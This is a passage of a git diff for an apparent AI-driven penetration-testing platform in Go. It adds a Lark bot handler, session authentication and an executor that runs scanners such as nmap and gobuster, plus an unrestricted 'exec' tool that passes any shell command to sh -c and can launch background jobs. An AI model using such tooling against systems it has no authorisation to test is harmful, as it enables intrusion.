logger.Info("飞书长连接已按配置重启关闭") + return + } + if err != nil { + logger.Warn("飞书长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff)) + } + select { + case <-ctx.Done(): + return + case <-time.After(backoff): + if backoff < larkReconnectMax { + backoff *= 2 + if backoff > larkReconnectMax { + backoff = larkReconnectMax + } + } + } + } +} + +func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, client *lark.Client, logger *zap.Logger) { + if event == nil || event.Event == nil || event.Event.Message == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil { + return + } + msg := event.Event.Message + msgType := larkcore.StringValue(msg.MessageType) + if msgType != larkim.MsgTypeText { + logger.Debug("飞书暂仅处理文本消息", zap.String("msg_type", msgType)) + return + } + var textBody larkTextContent + if err := json.Unmarshal([]byte(larkcore.StringValue(msg.Content)), &textBody); err != nil { + logger.Warn("飞书消息 Content 解析失败", zap.Error(err)) + return + } + text := strings.TrimSpace(textBody.Text) + if text == "" { + return + } + userID := resolveLarkUserID(event, cfg.AllowChatIDFallback && !strictUserIdentity) + if userID == "" { + logger.Warn("飞书消息缺少可用用户标识,已忽略") + return + } + messageID := larkcore.StringValue(msg.MessageId) + reply := h.HandleMessage("lark", userID, text) + contentBytes, _ := json.Marshal(larkTextContent{Text: reply}) + _, err := client.Im.Message.Reply(ctx, larkim.NewReplyMessageReqBuilder(). + MessageId(messageID). + Body(larkim.NewReplyMessageReqBodyBuilder(). + MsgType(larkim.MsgTypeText). + Content(string(contentBytes)). + Build()). + Build()) + if err != nil { + logger.Warn("飞书回复失败", zap.String("message_id", messageID), zap.Error(err)) + return + } + logger.Debug("飞书已回复", zap.String("message_id", messageID)) +} + +// resolveLarkUserID 提取飞书会话隔离键: +// tenant_key + 稳定用户标识(user_id/open_id/union_id);按配置可选 chat_id 兜底。 +func resolveLarkUserID(event *larkim.P2MessageReceiveV1, allowChatIDFallback bool) string { + if event == nil || event.Event == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil { + return "" + } + tenantKey := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.TenantKey)) + if tenantKey == "" { + tenantKey = "default" + } + prefix := "t:" + tenantKey + "|" + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UserId)); id != "" { + return prefix + "u:" + id + } + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.OpenId)); id != "" { + return prefix + "o:" + id + } + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UnionId)); id != "" { + return prefix + "n:" + id + } + if allowChatIDFallback && event.Event.Message != nil { + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Message.ChatId)); id != "" { + return prefix + "c:" + id + } + } + return "" +} diff --git a/security/auth_manager.go b/security/auth_manager.go new file mode 100644 index 00000000..3b9bd17b --- /dev/null +++ b/security/auth_manager.go @@ -0,0 +1,132 @@ +package security + +import ( + "errors" + "strings" + "sync" + "time" + + "github.com/google/uuid" +) + +// Predefined errors for authentication operations. +var ( + ErrInvalidPassword = errors.New("invalid password") +) + +// Session represents an authenticated user session. +type Session struct { + Token string + ExpiresAt time.Time +} + +// AuthManager manages password-based authentication and session lifecycle. +type AuthManager struct { + password string + sessionDuration time.Duration + + mu sync.RWMutex + sessions map[string]Session +} + +// NewAuthManager creates a new AuthManager instance. +func NewAuthManager(password string, sessionDurationHours int) (*AuthManager, error) { + if strings.TrimSpace(password) == "" { + return nil, errors.New("auth password must be configured") + } + + if sessionDurationHours <= 0 { + sessionDurationHours = 12 + } + + return &AuthManager{ + password: password, + sessionDuration: time.Duration(sessionDurationHours) * time.Hour, + sessions: make(map[string]Session), + }, nil +} + +// Authenticate validates the password and creates a new session. +func (a *AuthManager) Authenticate(password string) (string, time.Time, error) { + if password != a.password { + return "", time.Time{}, ErrInvalidPassword + } + + token := uuid.NewString() + expiresAt := time.Now().Add(a.sessionDuration) + + a.mu.Lock() + a.sessions[token] = Session{ + Token: token, + ExpiresAt: expiresAt, + } + a.mu.Unlock() + + return token, expiresAt, nil +} + +// ValidateToken checks whether the provided token is still valid. +func (a *AuthManager) ValidateToken(token string) (Session, bool) { + if strings.TrimSpace(token) == "" { + return Session{}, false + } + + a.mu.RLock() + session, ok := a.sessions[token] + a.mu.RUnlock() + if !ok { + return Session{}, false + } + + if time.Now().After(session.ExpiresAt) { + a.mu.Lock() + delete(a.sessions, token) + a.mu.Unlock() + return Session{}, false + } + + return session, true +} + +// CheckPassword verifies whether the provided password matches the current password. +func (a *AuthManager) CheckPassword(password string) bool { + a.mu.RLock() + defer a.mu.RUnlock() + return password == a.password +} + +// RevokeToken invalidates the specified token. +func (a *AuthManager) RevokeToken(token string) { + if strings.TrimSpace(token) == "" { + return + } + + a.mu.Lock() + delete(a.sessions, token) + a.mu.Unlock() +} + +// SessionDurationHours returns the configured session duration in hours. +func (a *AuthManager) SessionDurationHours() int { + return int(a.sessionDuration / time.Hour) +} + +// UpdateConfig updates the password and session duration, revoking existing sessions. +func (a *AuthManager) UpdateConfig(password string, sessionDurationHours int) error { + password = strings.TrimSpace(password) + if password == "" { + return errors.New("auth password must be configured") + } + + if sessionDurationHours <= 0 { + sessionDurationHours = 12 + } + + a.mu.Lock() + defer a.mu.Unlock() + + a.password = password + a.sessionDuration = time.Duration(sessionDurationHours) * time.Hour + a.sessions = make(map[string]Session) + return nil +} diff --git a/security/auth_middleware.go b/security/auth_middleware.go new file mode 100644 index 00000000..e7924a7a --- /dev/null +++ b/security/auth_middleware.go @@ -0,0 +1,51 @@ +package security + +import ( + "net/http" + "strings" + + "github.com/gin-gonic/gin" +) + +const ( + ContextAuthTokenKey = "authToken" + ContextSessionExpiry = "authSessionExpiry" +) + +// AuthMiddleware enforces authentication on protected routes. +func AuthMiddleware(manager *AuthManager) gin.HandlerFunc { + return func(c *gin.Context) { + token := extractTokenFromRequest(c) + session, ok := manager.ValidateToken(token) + if !ok { + c.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{ + "error": "未授权访问,请先登录", + }) + return + } + + c.Set(ContextAuthTokenKey, session.Token) + c.Set(ContextSessionExpiry, session.ExpiresAt) + c.Next() + } +} + +func extractTokenFromRequest(c *gin.Context) string { + authHeader := c.GetHeader("Authorization") + if authHeader != "" { + if len(authHeader) > 7 && strings.EqualFold(authHeader[0:7], "Bearer ") { + return strings.TrimSpace(authHeader[7:]) + } + return strings.TrimSpace(authHeader) + } + + if token := c.Query("token"); token != "" { + return strings.TrimSpace(token) + } + + if cookie, err := c.Cookie("auth_token"); err == nil { + return strings.TrimSpace(cookie) + } + + return "" +} diff --git a/security/executor.go b/security/executor.go new file mode 100644 index 00000000..9ce8e066 --- /dev/null +++ b/security/executor.go @@ -0,0 +1,1597 @@ +package security + +import ( + "bufio" + "context" + "encoding/json" + "fmt" + "io" + "os" + "os/exec" + "runtime" + "strconv" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/storage" + + "github.com/creack/pty" + "go.uber.org/zap" +) + +// ToolOutputCallback 用于在工具执行过程中把 stdout/stderr 增量推给上层(SSE)。 +// 通过 context 传递,避免修改 MCP ToolHandler 签名导致的“写死工具”问题。 +type ToolOutputCallback func(chunk string) + +type toolOutputCallbackCtxKey struct{} + +// ToolOutputCallbackCtxKey 是 context 中的 key,供 Agent 写入回调,Executor 读取并流式回调。 +var ToolOutputCallbackCtxKey = toolOutputCallbackCtxKey{} + +// Executor 安全工具执行器 +type Executor struct { + config *config.SecurityConfig + toolIndex map[string]*config.ToolConfig // 工具索引,用于 O(1) 查找 + mcpServer *mcp.Server + logger *zap.Logger + resultStorage ResultStorage // 结果存储(用于查询工具) +} + +// ResultStorage 结果存储接口(直接使用 storage 包的类型) +type ResultStorage interface { + SaveResult(executionID string, toolName string, result string) error + GetResult(executionID string) (string, error) + GetResultPage(executionID string, page int, limit int) (*storage.ResultPage, error) + SearchResult(executionID string, keyword string, useRegex bool) ([]string, error) + FilterResult(executionID string, filter string, useRegex bool) ([]string, error) + GetResultMetadata(executionID string) (*storage.ResultMetadata, error) + GetResultPath(executionID string) string + DeleteResult(executionID string) error +} + +// NewExecutor 创建新的执行器 +func NewExecutor(cfg *config.SecurityConfig, mcpServer *mcp.Server, logger *zap.Logger) *Executor { + executor := &Executor{ + config: cfg, + toolIndex: make(map[string]*config.ToolConfig), + mcpServer: mcpServer, + logger: logger, + resultStorage: nil, // 稍后通过 SetResultStorage 设置 + } + // 构建工具索引 + executor.buildToolIndex() + return executor +} + +// SetResultStorage 设置结果存储 +func (e *Executor) SetResultStorage(storage ResultStorage) { + e.resultStorage = storage +} + +// buildToolIndex 构建工具索引,将 O(n) 查找优化为 O(1) +func (e *Executor) buildToolIndex() { + e.toolIndex = make(map[string]*config.ToolConfig) + for i := range e.config.Tools { + if e.config.Tools[i].Enabled { + e.toolIndex[e.config.Tools[i].Name] = &e.config.Tools[i] + } + } + e.logger.Info("工具索引构建完成", + zap.Int("totalTools", len(e.config.Tools)), + zap.Int("enabledTools", len(e.toolIndex)), + ) +} + +// ExecuteTool 执行安全工具 +func (e *Executor) ExecuteTool(ctx context.Context, toolName string, args map[string]interface{}) (*mcp.ToolResult, error) { + e.logger.Info("ExecuteTool被调用", + zap.String("toolName", toolName), + zap.Any("args", args), + ) + + // 特殊处理:exec工具直接执行系统命令 + if toolName == "exec" { + e.logger.Info("执行exec工具") + return e.executeSystemCommand(ctx, args) + } + + // 使用索引查找工具配置(O(1) 查找) + toolConfig, exists := e.toolIndex[toolName] + if !exists { + e.logger.Error("工具未找到或未启用", + zap.String("toolName", toolName), + zap.Int("totalTools", len(e.config.Tools)), + zap.Int("enabledTools", len(e.toolIndex)), + ) + return nil, fmt.Errorf("工具 %s 未找到或未启用", toolName) + } + + e.logger.Info("找到工具配置", + zap.String("toolName", toolName), + zap.String("command", toolConfig.Command), + zap.Strings("args", toolConfig.Args), + ) + + // 特殊处理:内部工具(command 以 "internal:" 开头) + if strings.HasPrefix(toolConfig.Command, "internal:") { + e.logger.Info("执行内部工具", + zap.String("toolName", toolName), + zap.String("command", toolConfig.Command), + ) + return e.executeInternalTool(ctx, toolName, toolConfig.Command, args) + } + + // 构建命令 - 根据工具类型使用不同的参数格式 + cmdArgs := e.buildCommandArgs(toolName, toolConfig, args) + + e.logger.Info("构建命令参数完成", + zap.String("toolName", toolName), + zap.Strings("cmdArgs", cmdArgs), + zap.Int("argsCount", len(cmdArgs)), + ) + + // 验证命令参数 + if len(cmdArgs) == 0 { + e.logger.Warn("命令参数为空", + zap.String("toolName", toolName), + zap.Any("inputArgs", args), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("错误: 工具 %s 缺少必需的参数。接收到的参数: %v", toolName, args), + }, + }, + IsError: true, + }, nil + } + + // 执行命令 + cmd := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...) + applyDefaultTerminalEnv(cmd) + _ = prepareShellCmdSession(cmd) + + e.logger.Info("执行安全工具", + zap.String("tool", toolName), + zap.Strings("args", cmdArgs), + ) + + var output string + var err error + // 如果上层提供了 stdout/stderr 增量回调,则边执行边读取并回调。 + if cb, ok := ctx.Value(ToolOutputCallbackCtxKey).(ToolOutputCallback); ok && cb != nil { + output, err = streamCommandOutput(ctx, cmd, cb) + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到工具需要 TTY,使用 PTY 重试", + zap.String("tool", toolName), + ) + cmd2 := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...) + applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, err = runCommandWithPTY(ctx, cmd2, cb) + } + } else { + outputBytes, err2 := cmd.CombinedOutput() + output = string(outputBytes) + err = err2 + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到工具需要 TTY,使用 PTY 重试", + zap.String("tool", toolName), + ) + cmd2 := exec.CommandContext(ctx, toolConfig.Command, cmdArgs...) + applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, err = runCommandWithPTY(ctx, cmd2, nil) + } + } + if err != nil { + // 检查退出码是否在允许列表中 + exitCode := getExitCode(err) + if exitCode != nil && toolConfig.AllowedExitCodes != nil { + for _, allowedCode := range toolConfig.AllowedExitCodes { + if *exitCode == allowedCode { + e.logger.Info("工具执行完成(退出码在允许列表中)", + zap.String("tool", toolName), + zap.Int("exitCode", *exitCode), + zap.String("output", string(output)), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: string(output), + }, + }, + IsError: false, + }, nil + } + } + } + + e.logger.Error("工具执行失败", + zap.String("tool", toolName), + zap.Error(err), + zap.Int("exitCode", getExitCodeValue(err)), + zap.String("output", string(output)), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("工具执行失败: %v\n输出: %s", err, string(output)), + }, + }, + IsError: true, + }, nil + } + + e.logger.Info("工具执行成功", + zap.String("tool", toolName), + zap.String("output", string(output)), + ) + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: string(output), + }, + }, + IsError: false, + }, nil +} + +// RegisterTools 注册工具到MCP服务器 +func (e *Executor) RegisterTools(mcpServer *mcp.Server) { + e.logger.Info("开始注册工具", + zap.Int("totalTools", len(e.config.Tools)), + zap.Int("enabledTools", len(e.toolIndex)), + ) + + // 重新构建索引(以防配置更新) + e.buildToolIndex() + + for i, toolConfig := range e.config.Tools { + if !toolConfig.Enabled { + e.logger.Debug("跳过未启用的工具", + zap.String("tool", toolConfig.Name), + ) + continue + } + + // 创建工具配置的副本,避免闭包问题 + toolName := toolConfig.Name + toolConfigCopy := toolConfig + + // 根据配置决定暴露给 AI/API 的描述:short_description 或 description + useFullDescription := strings.TrimSpace(strings.ToLower(e.config.ToolDescriptionMode)) == "full" + shortDesc := toolConfigCopy.ShortDescription + if shortDesc == "" { + // 如果没有简短描述,从详细描述中提取第一行或前10000个字符 + desc := toolConfigCopy.Description + if len(desc) > 10000 { + if idx := strings.Index(desc, "\n"); idx > 0 && idx < 10000 { + shortDesc = strings.TrimSpace(desc[:idx]) + } else { + shortDesc = desc[:10000] + "..." + } + } else { + shortDesc = desc + } + } + if useFullDescription { + shortDesc = "" // 使用 description 时清空 ShortDescription,下游会回退到 Description + } + + tool := mcp.Tool{ + Name: toolConfigCopy.Name, + Description: toolConfigCopy.Description, + ShortDescription: shortDesc, + InputSchema: e.buildInputSchema(&toolConfigCopy), + } + + handler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + e.logger.Info("工具handler被调用", + zap.String("toolName", toolName), + zap.Any("args", args), + ) + return e.ExecuteTool(ctx, toolName, args) + } + + mcpServer.RegisterTool(tool, handler) + e.logger.Info("注册安全工具成功", + zap.String("tool", toolConfigCopy.Name), + zap.String("command", toolConfigCopy.Command), + zap.Int("index", i), + ) + } + + e.logger.Info("工具注册完成", + zap.Int("registeredCount", len(e.config.Tools)), + ) +} + +// buildCommandArgs 构建命令参数 +func (e *Executor) buildCommandArgs(toolName string, toolConfig *config.ToolConfig, args map[string]interface{}) []string { + cmdArgs := make([]string, 0) + + // 如果配置中定义了参数映射,使用配置中的映射规则 + if len(toolConfig.Parameters) > 0 { + // 检查是否有 scan_type 参数,如果有则替换默认的扫描类型参数 + hasScanType := false + var scanTypeValue string + if scanType, ok := args["scan_type"].(string); ok && scanType != "" { + hasScanType = true + scanTypeValue = scanType + } + + // 添加固定参数(如果指定了 scan_type,可能需要过滤掉默认的扫描类型参数) + if hasScanType && toolName == "nmap" { + // 对于 nmap,如果指定了 scan_type,跳过默认的 -sT -sV -sC + // 这些参数会被 scan_type 参数替换 + } else { + cmdArgs = append(cmdArgs, toolConfig.Args...) + } + + // 按位置参数排序 + positionalParams := make([]config.ParameterConfig, 0) + flagParams := make([]config.ParameterConfig, 0) + + for _, param := range toolConfig.Parameters { + if param.Position != nil { + positionalParams = append(positionalParams, param) + } else { + flagParams = append(flagParams, param) + } + } + + // 对于需要子命令的工具(如 gobuster dir),position 0 必须紧跟在命令名后、所有 flag 之前 + for _, param := range positionalParams { + if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" { + continue + } + if param.Position != nil && *param.Position == 0 { + value := e.getParamValue(args, param) + if value == nil && param.Default != nil { + value = param.Default + } + if value != nil { + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + break + } + } + + // 处理标志参数 + for _, param := range flagParams { + // 跳过特殊参数,它们会在后面单独处理 + // action 参数仅用于工具内部逻辑,不传递给命令 + if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" { + continue + } + + value := e.getParamValue(args, param) + if value == nil { + if param.Required { + // 必需参数缺失,返回空数组让上层处理错误 + e.logger.Warn("缺少必需的标志参数", + zap.String("tool", toolName), + zap.String("param", param.Name), + ) + return []string{} + } + continue + } + + // 布尔值特殊处理:如果为 false,跳过;如果为 true,只添加标志 + if param.Type == "bool" { + var boolVal bool + var ok bool + + // 尝试多种类型转换 + if boolVal, ok = value.(bool); ok { + // 已经是布尔值 + } else if numVal, ok := value.(float64); ok { + // JSON 数字类型(float64) + boolVal = numVal != 0 + ok = true + } else if numVal, ok := value.(int); ok { + // int 类型 + boolVal = numVal != 0 + ok = true + } else if strVal, ok := value.(string); ok { + // 字符串类型 + boolVal = strVal == "true" || strVal == "1" || strVal == "yes" + ok = true + } + + if ok { + if !boolVal { + continue // false 时不添加任何参数 + } + // true 时只添加标志,不添加值 + if param.Flag != "" { + cmdArgs = append(cmdArgs, param.Flag) + } + continue + } + } + + format := param.Format + if format == "" { + format = "flag" // 默认格式 + } + + switch format { + case "flag": + // --flag value 或 -f value + if param.Flag != "" { + cmdArgs = append(cmdArgs, param.Flag) + } + formattedValue := e.formatParamValue(param, value) + if formattedValue != "" { + cmdArgs = append(cmdArgs, formattedValue) + } + case "combined": + // --flag=value 或 -f=value + if param.Flag != "" { + cmdArgs = append(cmdArgs, fmt.Sprintf("%s=%s", param.Flag, e.formatParamValue(param, value))) + } else { + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + case "template": + // 使用模板字符串 + if param.Template != "" { + template := param.Template + template = strings.ReplaceAll(template, "{flag}", param.Flag) + template = strings.ReplaceAll(template, "{value}", e.formatParamValue(param, value)) + template = strings.ReplaceAll(template, "{name}", param.Name) + cmdArgs = append(cmdArgs, strings.Fields(template)...) + } else { + // 如果没有模板,使用默认格式 + if param.Flag != "" { + cmdArgs = append(cmdArgs, param.Flag) + } + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + case "positional": + // 位置参数(已在上面处理) + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + default: + // 默认:直接添加值 + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + } + + // 然后处理位置参数(位置参数通常在标志参数之后) + // 对位置参数按位置排序 + // 首先找到最大的位置值,确定需要处理多少个位置 + maxPosition := -1 + for _, param := range positionalParams { + if param.Position != nil && *param.Position > maxPosition { + maxPosition = *param.Position + } + } + + // 按位置顺序处理参数,确保即使某些位置没有参数或使用默认值,也能正确传递 + // position 0 已在前面插入(子命令优先),此处从 1 开始 + for i := 0; i <= maxPosition; i++ { + if i == 0 { + continue + } + for _, param := range positionalParams { + // 跳过特殊参数,它们会在后面单独处理 + // action 参数仅用于工具内部逻辑,不传递给命令 + if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" { + continue + } + + if param.Position != nil && *param.Position == i { + value := e.getParamValue(args, param) + if value == nil { + if param.Required { + // 必需参数缺失,返回空数组让上层处理错误 + e.logger.Warn("缺少必需的位置参数", + zap.String("tool", toolName), + zap.String("param", param.Name), + zap.Int("position", *param.Position), + ) + return []string{} + } + // 对于非必需参数,如果值为 nil,尝试使用默认值 + if param.Default != nil { + value = param.Default + } else { + // 如果没有默认值,跳过这个位置,继续处理下一个位置 + break + } + } + // 只有当值不为 nil 时才添加到命令参数中 + if value != nil { + cmdArgs = append(cmdArgs, e.formatParamValue(param, value)) + } + break + } + } + // 如果某个位置没有找到对应的参数,继续处理下一个位置 + // 这样可以确保位置参数的顺序正确 + } + + // 特殊处理:additional_args 参数(需要按空格分割成多个参数) + if additionalArgs, ok := args["additional_args"].(string); ok && additionalArgs != "" { + // 按空格分割,但保留引号内的内容 + additionalArgsList := e.parseAdditionalArgs(additionalArgs) + cmdArgs = append(cmdArgs, additionalArgsList...) + } + + // 特殊处理:scan_type 参数(需要按空格分割并插入到合适位置) + if hasScanType { + scanTypeArgs := e.parseAdditionalArgs(scanTypeValue) + if len(scanTypeArgs) > 0 { + // 对于 nmap,scan_type 应该替换默认的扫描类型参数 + // 由于我们已经跳过了默认的 args,现在需要将 scan_type 插入到合适位置 + // 找到 target 参数的位置(通常是最后一个位置参数) + insertPos := len(cmdArgs) + for i := len(cmdArgs) - 1; i >= 0; i-- { + // target 通常是最后一个非标志参数 + if !strings.HasPrefix(cmdArgs[i], "-") { + insertPos = i + break + } + } + // 在 target 之前插入 scan_type 参数 + newArgs := make([]string, 0, len(cmdArgs)+len(scanTypeArgs)) + newArgs = append(newArgs, cmdArgs[:insertPos]...) + newArgs = append(newArgs, scanTypeArgs...) + newArgs = append(newArgs, cmdArgs[insertPos:]...) + cmdArgs = newArgs + } + } + + return cmdArgs + } + + // 如果没有定义参数配置,使用固定参数和通用处理 + // 添加固定参数 + cmdArgs = append(cmdArgs, toolConfig.Args...) + + // 通用处理:将参数转换为命令行参数 + for key, value := range args { + if key == "_tool_name" { + continue + } + // 使用 --key value 格式 + cmdArgs = append(cmdArgs, fmt.Sprintf("--%s", key)) + if strValue, ok := value.(string); ok { + cmdArgs = append(cmdArgs, strValue) + } else { + cmdArgs = append(cmdArgs, fmt.Sprintf("%v", value)) + } + } + + return cmdArgs +} + +// parseAdditionalArgs 解析 additional_args 字符串,按空格分割但保留引号内的内容 +func (e *Executor) parseAdditionalArgs(argsStr string) []string { + if argsStr == "" { + return []string{} + } + + result := make([]string, 0) + var current strings.Builder + inQuotes := false + var quoteChar rune + escapeNext := false + + runes := []rune(argsStr) + for i := 0; i < len(runes); i++ { + r := runes[i] + + if escapeNext { + current.WriteRune(r) + escapeNext = false + continue + } + + if r == '\\' { + // 检查下一个字符是否是引号 + if i+1 < len(runes) && (runes[i+1] == '"' || runes[i+1] == '\'') { + // 转义的引号:跳过反斜杠,将引号作为普通字符写入 + i++ + current.WriteRune(runes[i]) + } else { + // 其他转义字符:写入反斜杠,下一个字符会在下次迭代处理 + escapeNext = true + current.WriteRune(r) + } + continue + } + + if !inQuotes && (r == '"' || r == '\'') { + inQuotes = true + quoteChar = r + continue + } + + if inQuotes && r == quoteChar { + inQuotes = false + quoteChar = 0 + continue + } + + if !inQuotes && (r == ' ' || r == '\t' || r == '\n') { + if current.Len() > 0 { + result = append(result, current.String()) + current.Reset() + } + continue + } + + current.WriteRune(r) + } + + // 处理最后一个参数(如果存在) + if current.Len() > 0 { + result = append(result, current.String()) + } + + // 如果解析结果为空,使用简单的空格分割作为降级方案 + if len(result) == 0 { + result = strings.Fields(argsStr) + } + + return result +} + +// getParamValue 获取参数值,支持默认值 +func (e *Executor) getParamValue(args map[string]interface{}, param config.ParameterConfig) interface{} { + // 从参数中获取值 + if value, ok := args[param.Name]; ok && value != nil { + return value + } + + // 如果参数是必需的但没有提供,返回 nil(让上层处理错误) + if param.Required { + return nil + } + + // 返回默认值 + return param.Default +} + +// formatParamValue 格式化参数值 +func (e *Executor) formatParamValue(param config.ParameterConfig, value interface{}) string { + switch param.Type { + case "bool": + // 布尔值应该在上层处理,这里不应该被调用 + if boolVal, ok := value.(bool); ok { + return fmt.Sprintf("%v", boolVal) + } + return "false" + case "array": + // 数组:转换为逗号分隔的字符串 + if arr, ok := value.([]interface{}); ok { + strs := make([]string, 0, len(arr)) + for _, item := range arr { + strs = append(strs, fmt.Sprintf("%v", item)) + } + return strings.Join(strs, ",") + } + return fmt.Sprintf("%v", value) + case "object": + // 对象/字典:序列化为 JSON 字符串 + if jsonBytes, err := json.Marshal(value); err == nil { + return string(jsonBytes) + } + // 如果 JSON 序列化失败,回退到默认格式化 + return fmt.Sprintf("%v", value) + default: + formattedValue := fmt.Sprintf("%v", value) + // 特殊处理:对于 ports 参数(通常是 nmap 等工具的端口参数),清理空格 + // nmap 不接受端口列表中有空格,例如 "80,443, 22" 应该变成 "80,443,22" + if param.Name == "ports" { + // 移除所有空格,但保留逗号和其他字符 + formattedValue = strings.ReplaceAll(formattedValue, " ", "") + } + return formattedValue + } +} + +// IsBackgroundShellCommand 检测命令是否为完全后台命令(末尾有独立 &,且不在引号内)。 +// command1 & command2 不算完全后台(command2 仍在前台执行)。 +func IsBackgroundShellCommand(command string) bool { + // 移除首尾空格 + command = strings.TrimSpace(command) + if command == "" { + return false + } + + // 检查命令中所有不在引号内的 & 符号 + // 找到最后一个 & 符号,检查它是否在命令末尾 + inSingleQuote := false + inDoubleQuote := false + escaped := false + lastAmpersandPos := -1 + + for i, r := range command { + if escaped { + escaped = false + continue + } + if r == '\\' { + escaped = true + continue + } + if r == '\'' && !inDoubleQuote { + inSingleQuote = !inSingleQuote + continue + } + if r == '"' && !inSingleQuote { + inDoubleQuote = !inDoubleQuote + continue + } + if r == '&' && !inSingleQuote && !inDoubleQuote { + // 检查 & 前后是否有空格或换行(确保是独立的 &,而不是变量名的一部分) + isStandalone := false + + // 检查前面:空格、制表符、换行符,或者是命令开头 + if i == 0 { + isStandalone = true + } else { + prev := command[i-1] + if prev == ' ' || prev == '\t' || prev == '\n' || prev == '\r' { + isStandalone = true + } + } + + // 检查后面:空格、制表符、换行符,或者是命令末尾 + if isStandalone { + if i == len(command)-1 { + // 在末尾,肯定是独立的 & + lastAmpersandPos = i + } else { + next := command[i+1] + if next == ' ' || next == '\t' || next == '\n' || next == '\r' { + // 后面有空格,是独立的 & + lastAmpersandPos = i + } + } + } + } + } + + // 如果没有找到 & 符号,不是后台命令 + if lastAmpersandPos == -1 { + return false + } + + // 检查最后一个 & 后面是否还有非空内容 + afterAmpersand := strings.TrimSpace(command[lastAmpersandPos+1:]) + if afterAmpersand == "" { + // & 在末尾或后面只有空白字符,这是完全后台命令 + // 检查 & 前面是否有内容 + beforeAmpersand := strings.TrimSpace(command[:lastAmpersandPos]) + return beforeAmpersand != "" + } + + // 如果 & 后面还有非空内容,说明是 command1 & command2 的情况 + // 这种情况下,command2会在前台执行,所以不算完全后台命令 + return false +} + +// executeSystemCommand 执行系统命令 +func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + // 获取命令 + command, ok := args["command"].(string) + if !ok { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: 缺少command参数", + }, + }, + IsError: true, + }, nil + } + + if command == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: command参数不能为空", + }, + }, + IsError: true, + }, nil + } + + // 安全检查:记录执行的命令 + e.logger.Warn("执行系统命令", + zap.String("command", command), + ) + + // 获取shell类型(可选,默认为sh) + shell := "sh" + if s, ok := args["shell"].(string); ok && s != "" { + shell = s + } + + // 获取工作目录(可选) + workDir := "" + if wd, ok := args["workdir"].(string); ok && wd != "" { + workDir = wd + } + + // 检测是否为后台命令(包含 & 符号,但不在引号内) + isBackground := IsBackgroundShellCommand(command) + + // 构建命令 + var cmd *exec.Cmd + if workDir != "" { + cmd = exec.CommandContext(ctx, shell, "-c", command) + cmd.Dir = workDir + } else { + cmd = exec.CommandContext(ctx, shell, "-c", command) + } + applyDefaultTerminalEnv(cmd) + _ = prepareShellCmdSession(cmd) + + // 执行命令 + e.logger.Info("执行系统命令", + zap.String("command", command), + zap.String("shell", shell), + zap.String("workdir", workDir), + zap.Bool("isBackground", isBackground), + ) + + // 如果是后台命令,使用特殊处理来获取实际的后台进程PID + if isBackground { + // 移除命令末尾的 & 符号 + commandWithoutAmpersand := strings.TrimSuffix(strings.TrimSpace(command), "&") + commandWithoutAmpersand = strings.TrimSpace(commandWithoutAmpersand) + + // 构建新命令:将用户命令置于独立重定向的后台作业,再 echo $pid。 + // 若子进程与 echo 共享同一 stdout 管道,且长时间不向 stdout 写入换行, + // bufio.ReadString('\n') 会永久阻塞(例如 beacon 持续写二进制/单行日志)。 + pidCommand := fmt.Sprintf("%s /dev/null 2>&1 & pid=$!; echo $pid", commandWithoutAmpersand) + + // 创建新命令来获取PID + var pidCmd *exec.Cmd + if workDir != "" { + pidCmd = exec.CommandContext(ctx, shell, "-c", pidCommand) + pidCmd.Dir = workDir + } else { + pidCmd = exec.CommandContext(ctx, shell, "-c", pidCommand) + } + applyDefaultTerminalEnv(pidCmd) + _ = prepareShellCmdSession(pidCmd) + + // 获取stdout管道 + stdout, err := pidCmd.StdoutPipe() + if err != nil { + e.logger.Error("创建stdout管道失败", + zap.String("command", command), + zap.Error(err), + ) + // 如果创建管道失败,使用shell进程的PID作为fallback + if err := pidCmd.Start(); err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令启动失败: %v", err), + }, + }, + IsError: true, + }, nil + } + pid := pidCmd.Process.Pid + go pidCmd.Wait() // 在后台等待,避免僵尸进程 + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令已启动\n命令: %s\n进程ID: %d (可能不准确,获取PID失败)\n\n注意: 后台进程将继续运行,不会等待其完成。", command, pid), + }, + }, + IsError: false, + }, nil + } + + // 启动命令 + if err := pidCmd.Start(); err 